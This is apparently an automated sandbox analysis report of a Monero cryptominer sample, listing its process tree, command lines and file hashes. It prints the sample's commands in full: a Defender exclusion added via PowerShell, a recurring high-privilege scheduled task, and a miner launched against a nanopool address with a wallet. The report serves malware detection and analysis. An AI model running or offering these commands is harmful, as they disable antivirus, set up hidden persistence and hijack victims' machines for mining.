C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:676
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵PID:1164
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:804
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.1MB
MD5a3d7148655137e92c28b33e48d088088
SHA1bc98804abf481e58c925a0810c519c6c5f2d3ac0
SHA2565b0bfb92bb76a12c69669a08ef723377b9eaaf50eab6fe83b4c3f21d593f998f
SHA512ca131ce06bc6cbd47a58cc11f80a4db576effa3325f11222123fd6829589f29f894834679e09c3e50a50ef8019325d1a6fffab07d49fda43179a544ea4697373
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD560838ff2c4002703b09fe1b38de15996
SHA16d53e131c6470ae622f8eea471c9627a932f46d3
SHA25606dbda2ec7c954579208597f88601287e34930bf7385463f7ca60e2868207312
SHA51297347a0651573b709fc9d08577b578bf56d055033985a6cbc09b2a015912a27d9bf311352005f9cee7f668af3d895704e861ac0aba4a6b58893ada9bcc57b776
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD512ea9cdb6a3f477268a6aaff5bb71269
SHA1e4c774b763d8ab5c36516b7a4fa2359e770dae03
SHA256bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1
SHA5121a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD512ea9cdb6a3f477268a6aaff5bb71269
SHA1e4c774b763d8ab5c36516b7a4fa2359e770dae03
SHA256bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1
SHA5121a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD512ea9cdb6a3f477268a6aaff5bb71269
SHA1e4c774b763d8ab5c36516b7a4fa2359e770dae03
SHA256bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1
SHA5121a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD512ea9cdb6a3f477268a6aaff5bb71269
SHA1e4c774b763d8ab5c36516b7a4fa2359e770dae03
SHA256bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1
SHA5121a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD512ea9cdb6a3f477268a6aaff5bb71269
SHA1e4c774b763d8ab5c36516b7a4fa2359e770dae03
SHA256bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1
SHA5121a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434
-
Filesize
3.1MB
MD57737cc2f0bf1d0aebcaf14be3e1d83fe
SHA117784293db75fd968fadb557b95da28fcecc8189
SHA2560eac2b0a121b287a323a3941dfcb2244c026656d29c20697abe90ead1d50dc9c
SHA512f8a5346fcc5c295a3ccff948f2c8b7a6c0c21266b49fb79f195d47e24f8a86fc739b4569d83a53f5b9e237ca8a09d5ed931c5422e52e162945e6b1db939d995d
-
Filesize
3.1MB
MD57737cc2f0bf1d0aebcaf14be3e1d83fe
SHA117784293db75fd968fadb557b95da28fcecc8189
SHA2560eac2b0a121b287a323a3941dfcb2244c026656d29c20697abe90ead1d50dc9c
SHA512f8a5346fcc5c295a3ccff948f2c8b7a6c0c21266b49fb79f195d47e24f8a86fc739b4569d83a53f5b9e237ca8a09d5ed931c5422e52e162945e6b1db939d995d